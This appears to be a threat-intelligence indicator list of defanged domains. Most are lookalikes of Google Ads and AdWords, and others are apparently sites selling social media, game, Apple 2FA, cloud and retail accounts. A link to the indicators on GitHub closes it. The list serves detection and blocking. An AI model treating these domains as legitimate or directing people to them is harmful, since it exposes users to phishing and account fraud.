googlead[.]click
adgoogle[.]one
googleadwords[.]top
adgoogle[.]lat
adsgoogle[.]lol
adgoogle[.]tube
adgoogle[.]bet
googlead[.]bet
googlead[.]lol
googlead[.]me
adgoogle[.]vip
adgoogle[.]top
googlead[.]bid
googlead[.]cc
adgoogle[.]bid
googlead[.]one
adgoogle[.]cc
adsgoogle[.]bond
adgoogle[.]info
googleadwords[.]beauty
googlead[.]beauty
adsgoogle[.]pics
adgoogle[.]xyz
adwordsad[.]me
adwordsad[.]sbs
adwordsad[.]shop
adwordsad[.]co
adwordsad[.]blog
adwordsad[.]biz
adwordsad[.]best
adwordsad[.]my
adwordsad[.]cyou
adwordsad[.]org
adwordsad[.]art
adwordsad[.]one
adwordsad[.]click
adwordsad[.]pro
adwordsad[.]asia
adwordsad[.]vip
adwordsad[.]bet
adwordsad[.]tube
adwordsad[.]bid
adwordsad[.]cc
adwordsad[.]icu
adwordsad[.]lol
adwordsad[.]pw
adwordsad[.]info
googleadwords[.]cv
adsgoogle[.]cv
adsgoogle[.]sbs
adsgoogle[.]best
adsgoogle[.]blog
adsgoogle[.]cyou
adsgoogle[.]pro
adsgoogle[.]icu
adsgoogle[.]click
adsgoogle[.]one
adsgoogle[.]bid
googleadwords[.]icu
googleadwords[.]shop
googleadwords[.]my
googleadwords[.]lat
googleadwords[.]club
googleadwords[.]info
googleadwords[.]cheap
googleadwords[.]me
googleadwords[.]bid
googleadwords[.]org
googleadwords[.]click
googleadwords[.]vip
googleadwords[.]best
googleadwords[.]blog
googleadwords[.]cloud
googleadwords[.]cc
googleadwords[.]buzz
googleadwords[.]cfd
googleadwords[.]cyou
googleadwords[.]pro
googleadwords[.]sbs
buyadwords[.]cv
buyadwords[.]bid
buyadwords[.]org
buyadwords[.]vip
buyadwords[.]click
buyadwords[.]one
buyadwords[.]my
selladwords[.]cv
selladwords[.]click
selladwords[.]co
buyadwords[.]sbs
buyadwords[.]icu
selladwords[.]xyz
selladwords[.]com
selladwords[.]shop

Social Media Accounts
redditaccsbuy[.]com
user-sale[.]com
regularpva[.]com
shiftxchange[.]biz
twitterxarena[.]com
redditarena[.]com
discordarena[.]com

Game Accounts
atshopr[.]com
nonlethalweaponsbook[.]com
mysticmisery[.]com
roadaccounts[.]com
fndrop[.]com
fortniteaccs[.]com
accountshubs[.]com
bootybay[.]gg
totalbattleaccounts[.]com

Apple 2FA Accounts
isp-rebellion[.]com

Cloud and BHW Accounts
buybhwaccounts[.]xyz
acctrusted[.]com
topcloudacc[.]com

Retail Accounts
instantaccountshop[.]com

IOCs on GitHub

If the community has any additional input, please let us know.

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/AccountsForSale
